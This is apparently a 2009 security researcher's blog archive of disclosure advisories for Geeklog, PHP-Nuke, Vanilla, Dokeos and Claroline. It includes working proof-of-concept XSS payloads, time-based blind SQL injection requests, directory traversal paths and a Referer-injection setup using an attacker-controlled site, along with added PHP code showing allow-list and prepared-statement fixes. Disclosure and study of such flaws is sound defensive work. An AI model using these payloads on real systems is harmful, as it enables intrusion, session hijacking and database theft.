Tuesday, July 28, 2009

Geeklog v.1.6.0 Cross-Site Scripting

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Geeklog (1.6.0)
Product Homepage: http://www.geeklog.net/
Versions Affected: v.1.6.0 (Other versions may also be affected)
Severity: Medium

Input passed to the 'shortmsg' and 'message' POST parameters when posting to '/profiles.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Example 1:
POST /profiles.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

what=sendstory&from=x&fromemail=x&to=x&toemail=x&shortmsg=1</textarea><script>alert(1234)</script><textarea>&sid=welcome
will result in:
<td><textarea name="shortmsg" rows="8" style="width:100%">1</textarea><script>alert(1234)</script><textarea></textarea></td>


Example 2:
POST /profiles.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

what=contact&author=x&authoremail=x&subject=x&message=1</textarea><script>alert(123)</script>&uid=2
will result in:
<td><textarea name="message" wrap="physical" rows="10" cols="50">1</textarea><script>alert(123)</script></textarea></td>


Status:
1. Contacted the author at: July 28, 2009 via security email.
2. The author promptly fixed the problem, see at http://www.geeklog.net/article.php/geeklog-1.6.0sr1.

Wednesday, May 27, 2009

PHP Nuke v.8.0 (referer) SQL Injection

Author: Gerendi Sandor Attila
Date: May 14, 2009
Package: PHP-Nuke
Product homepage: http://phpnuke.org/
Versions Affected: v.8.0 (Other versions may also be affected)
Severity: High

The 'referer' request header, when requesting '/main/tracking/userLog.php', is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Description:

- Sample request:
GET http://somehost/PHP-Nuke-8.0/index.php HTTP/1.0
Accept: */*
referer: '+IF(False,'',SLEEP(5))+'
This will result in a query like:
INSERT INTO nuke_referer VALUES (NULL, ''+IF(False,'',SLEEP(5))+'')
and the HTTP response will arrive after 5 seconds. Replacing the 'False' condition with conditional subqueries can be used to extract arbitrary data from the database; the injection can also be used to insert arbitrary data into the 'nuke_referer' table.

Status:
1. Contacted the author at: May 14, 2009 via: http://phpnuke.org/modules.php?name=Feedback
2. No response received (May 27, 2009)
3. According to Evaders99 this vulnerability was already reported in 2007 (http://secunia.com/advisories/cve_reference/CVE-2007-1061/), thanks for the update. Still the downloadable v.8.0 was vulnerable.

Friday, May 15, 2009

Vanilla v.1.1.7 Cross-Site Scripting

Author: Gerendi Sandor Attila
Date: May 14, 2009
Package: Vanilla (1.1.7)
Product Homepage: http://getvanilla.com/
Versions Affected: v.1.1.7, 1.1.5 (Other versions may also be affected)
Severity: Medium

Input passed to the 'RequestName' header parameter when posting to '/ajax/updatecheck.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Example:
http://somehost/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>
will return:
1<script>alert(123)</script>|[ERROR]There was a problem authenticating your post information.

Status:
1. Contacted the author at: May 15, 2009 via http://lussumo.com/
2. The author corrected the problem on the same day (read here).

Thursday, May 14, 2009

PHP Nuke v.8.0 Directory Traversal

Author: Gerendi Sandor Attila
Date: May 04, 2009
Package: PHP-Nuke
Product homepage: http://phpnuke.org/
Versions Affected: v.8.0 (Other versions may also be affected)
Severity: High

The cookie parameter "lang" in "/modules.php" is vulnerable to directory traversal attacks and possibly to arbitrary code inclusion/execution.

Description:
In mainfile.php we have (lines 3316-333):

if (isset($newlang) AND !stripos_clone($newlang,".")) {
    // $newlang is filtered for a dot before it reaches include_once
    if (file_exists("language/lang-".$newlang.".php")) {
        setcookie("lang",$newlang,time()+31536000);
        include_once("language/lang-".$newlang.".php");
        $currentlang = $newlang;
    } else {
        setcookie("lang",$language,time()+31536000);
        include_once("language/lang-".$language.".php");
        $currentlang = $language;
    }
} elseif (isset($lang)) {
    // $lang comes from the "lang" cookie and is included without any check
    include_once("language/lang-".$lang.".php");
    $currentlang = $lang;
} else {
    setcookie("lang",$language,time()+31536000);
    include_once("language/lang-".$language.".php");
    $currentlang = $language;
}
Now look at this statement: include_once("language/lang-".$lang.".php"); on Windows, a nonexistent path component can be used as the base for directory traversal. So assume c:\somefile.php exists and the web server is also installed somewhere on c:\; inserting something like:
/../../../../../../../../../somefile.php
will result in:
include_once('language/lang-/../../../../../../../../../somefile.php');
and the file will be included.

Status:
1. Contacted the author at: May 04, 2009 via: http://phpnuke.org/modules.php?name=Feedback
2. No response was received (May 14, 2009).
3. According to Evaders99 this vulnerability was already reported in 2007 (http://secunia.com/advisories/24484/), thanks for the update. Still the downloadable v.8.0 was vulnerable.

Wednesday, May 13, 2009

Dokeos Free v.1.8.5 Multiple Vulnerabilities

Author: Gerendi Sandor Attila
Date: April 24, 2009
Package: Dokeos Free 1.8.5 Valparais
Product homepage: http://www.dokeos.com/
Versions Affected: v.1.8.5 (Other versions may also be affected)
Severity: High

SQL Injection:

1. The 'uInfo' parameter from /main/tracking/userLog.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Requires magic_quotes_gpc=OFF, but as you can see at http://www.php.net/magic_quotes, relying on the magic_quotes_gpc=ON feature is highly discouraged.

Proof of concept custom request (SLEEP only works with MySQL > 5.0, but there are many other alternatives):
http://somehost/main/tracking/userLog.php?uInfo=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)%23
This request will 'hang' for 30 seconds.

The resulting query will be:
SELECT * FROM `wa_dokeos_1_8_5_dokeos_main`.`user` WHERE `user_id` = '1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)#'
executed from get_user_info_from_id.

2. The 'course' parameter from /main/mySpace/lp_tracking.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Exploitation is similar to the vulnerability at point 1.
More complex injections can also be built to extract arbitrary data from the database using a true/false condition-based sequential extraction mechanism.

XSS (Cross-Site Scripting):

1. The 'curdirpath' parameter from /main/document/slideshow.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
http://somehost/main/document/slideshow.php?curdirpath=1<script>alert(123)</script>
2. The 'file' parameter from /main/exercice/testheaderpage.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
http://somehost/main/exercice/testheaderpage.php?file=1<script>alert(123)</script>
Possible directory traversal (ineffective sanitization):

In 'hotspot_lang_conversion.php', $_GET['lang'] is sanitized as follows:

$search = array('../','\\0');   // in a single-quoted string '\\0' is a backslash followed by a zero, not a NUL byte
$lang = str_replace($search,'',urldecode($_GET['lang']));   // one non-recursive pass, '../' only

The sanitization is weak here: on Windows, ..\..\..\..\..\ works as well as /../../../, and this str_replace call does not remove a NUL character injected through the URL request. On Windows a query like this will pass the sanitization:

http://somehost/main/exercice/hotspot_lang_conversion.php?lang=..\..\..\..\..\..\..\todo.txt
Directory traversal:

1. Input passed to the "doc_url" parameter in "/main/exercice/Hpdownload.php" isn't properly verified before it is used to include files. This can be exploited to read arbitrary files from local resources.
http://somehost/main/exercice/Hpdownload.php?doc_url=..\..\..\..\..\..\..\todo.txt
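As an added example (not code from PHP-Nuke or Dokeos), the PHP below shows why the str_replace filter above is insufficient and how a language loader can instead validate the 'lang' value with an allow-list plus a realpath containment check; the same check applies to the unchecked include_once of $lang in the PHP-Nuke mainfile.php snippet earlier on this page. The temporary directory and the language file it creates are constructed for the demonstration.

```php
<?php
// Added example, not PHP-Nuke or Dokeos code: validate the "lang" value instead
// of trying to strip traversal sequences out of it. Assumes language files are
// named lang-<name>.php inside one directory, as in the mainfile.php snippet.

// The filter from hotspot_lang_conversion.php, reproduced for comparison.
function weak_sanitize(string $lang): string {
    $search = array('../', '\\0');   // '\\0' is backslash + zero, not a NUL byte
    return str_replace($search, '', urldecode($lang));
}

// Hardened loader: allow-list the shape of the name, then confirm the resolved
// file really lies inside the language directory. Returns null on rejection.
function resolve_lang_file(string $lang, string $langDir): ?string {
    // Only short lowercase names such as "english" or "pt-br" are accepted.
    if (!preg_match('/\A[a-z]{2,20}(?:-[a-z]{2,5})?\z/', $lang)) {
        return null;
    }
    $base = realpath($langDir);
    $file = realpath($langDir . DIRECTORY_SEPARATOR . 'lang-' . $lang . '.php');
    if ($base === false || $file === false) {
        return null;                       // directory or file does not exist
    }
    // Containment check: the canonical path must start with the canonical base.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Demonstration against a temporary language directory (constructed).
$dir = sys_get_temp_dir() . '/langdemo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/lang-english.php", "<?php\n\$currentlang = 'english';\n");

$inputs = array(
    'english',
    '/../../../../../../../../../somefile.php',   // PHP-Nuke cookie payload
    '..\..\..\..\..\..\..\todo.txt',              // Dokeos payload
    '....//....//etc/passwd',                     // one pass leaves ../../etc/passwd
);
foreach ($inputs as $in) {
    $result = resolve_lang_file($in, $dir);
    printf("%-44s weak=%-24s hardened=%s\n", $in, weak_sanitize($in),
        $result === null ? 'REJECTED' : basename($result));
}
unlink("$dir/lang-english.php");
rmdir($dir);
```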
Status:
1. Contacted the author at April 29, 2009 via email.
2. The author released a patch (read here).

Tuesday, May 12, 2009

Claroline v.1.8.11 SQL Injection

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High

The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Example, the request:
http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3
will generate the following SQL query:
SELECT * FROM `c_TEST1_group_team` `g`

# retrieve the tutor id
LEFT JOIN `claroline_1_8_11`.`cl_user` AS `tutor`
ON `tutor`.`user_id` = `g`.`tutor`

# retrieve the user group(s)
LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0

# count the registered users in each group
LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
ON `ug2`.`team` = `g`.`id`

GROUP BY `g`.`id`
ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20
This query will take about 10 seconds to complete. Replacing the FALSE condition (from IF(FALSE,1,SLEEP(10))) with conditional subqueries may be used to extract arbitrary data from the database.
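As an added example (not Claroline, Dokeos or PHP-Nuke code), the PHP below shows the two fixes the SQL injection reports on this page call for: bound parameters for value positions such as the 'referer' header or 'uInfo', and an allow-list for the 'sort' and 'dir' values that land in the ORDER BY clause, where a placeholder cannot be used. The table and column names are constructed, and SQLite stands in for MySQL so the script runs offline.

```php
<?php
// Added example, not Claroline, Dokeos or PHP-Nuke code. The SQL injections above
// fall into two classes: values such as uInfo, course or the Referer header can
// be bound as parameters, while Claroline's sort/dir land in an ORDER BY clause,
// where placeholders are not allowed, so they go through an allow-list instead.
// Table and column names are constructed; SQLite stands in for MySQL.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE referer (id INTEGER PRIMARY KEY, url TEXT)');
$db->exec('CREATE TABLE team (id INTEGER PRIMARY KEY, name TEXT, tutor INTEGER)');
$db->exec("INSERT INTO team (name, tutor) VALUES ('alpha', 2), ('beta', 1)");

// Value position: bind the header instead of concatenating it into the INSERT.
function log_referer(PDO $db, string $referer): int {
    $stmt = $db->prepare('INSERT INTO referer (url) VALUES (:url)');
    $stmt->execute(array(':url' => $referer));
    return (int) $db->lastInsertId();
}

// Identifier position: only a known column name and direction reach the query;
// anything else silently falls back to the defaults.
const SORT_COLUMNS = array('id' => 'id', 'name' => 'name', 'tutor' => 'tutor');
const SORT_DIRS    = array('asc' => 'ASC', 'desc' => 'DESC');

function list_teams(PDO $db, string $sort, string $dir, int $limit = 20): array {
    $col = SORT_COLUMNS[strtolower($sort)] ?? 'id';
    $ord = SORT_DIRS[strtolower($dir)] ?? 'ASC';
    $stmt = $db->prepare("SELECT id, name, tutor FROM team ORDER BY $col $ord LIMIT :lim");
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The PHP-Nuke payload is stored verbatim as data; no SQL inside it runs.
$id = log_referer($db, "'+IF(False,'',SLEEP(5))+'");
$stmt = $db->prepare('SELECT url FROM referer WHERE id = :id');
$stmt->execute(array(':id' => $id));
echo 'stored referer: ', $stmt->fetchColumn(), "\n";

// The Claroline payload never becomes SQL: the sort falls back to "id ASC".
foreach (list_teams($db, 'IF(FALSE,1,SLEEP(10))', '3') as $t) {
    echo "{$t['id']} {$t['name']} tutor={$t['tutor']}\n";
}
```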

Status:
1. Contacted the author at: May 07, 2009 via http://forum.claroline.net/.
2. The author fixed the problem, read at: Re: Claroline v.1.8.11 SQL Injection

Tuesday, May 5, 2009

Claroline v.1.8.11 Cross-Site Scripting

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: Medium

Input passed to the 'Referer' header parameter when posting to '/claroline/linker/notfound.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Example:
GET /claroline_1_8_11/claroline/linker/notfound.php HTTP/1.0
Accept: */*
Referer: "><script>alert(123)</script><a href="

There are a couple of ways to inject arbitrary text (JavaScript in our case) into the Referer header. One of them is a rewrite rule on the remote attacker's server. Example .htaccess file:
RewriteEngine on
RewriteRule ^referer/.*$ test.php [L]
where test.php contains the link to /claroline_1_8_11/claroline/linker/notfound.php.

Now a request like: http://remoteatackersite/referer/?"><script>alert(123)</script><a%20href="

will return a page from which following the link to /claroline_1_8_11/claroline/linker/notfound.php triggers the XSS.

Note: the first request requires a browser such as IE, which does not automatically URL-encode the GET parameters.

Status:
1. Contacted the author at: May 05, 2009 via http://forum.claroline.net/.
2. The author promptly (same day) fixed the problem, read at: Re: Claroline 1.8.11 Cross-Site Scripting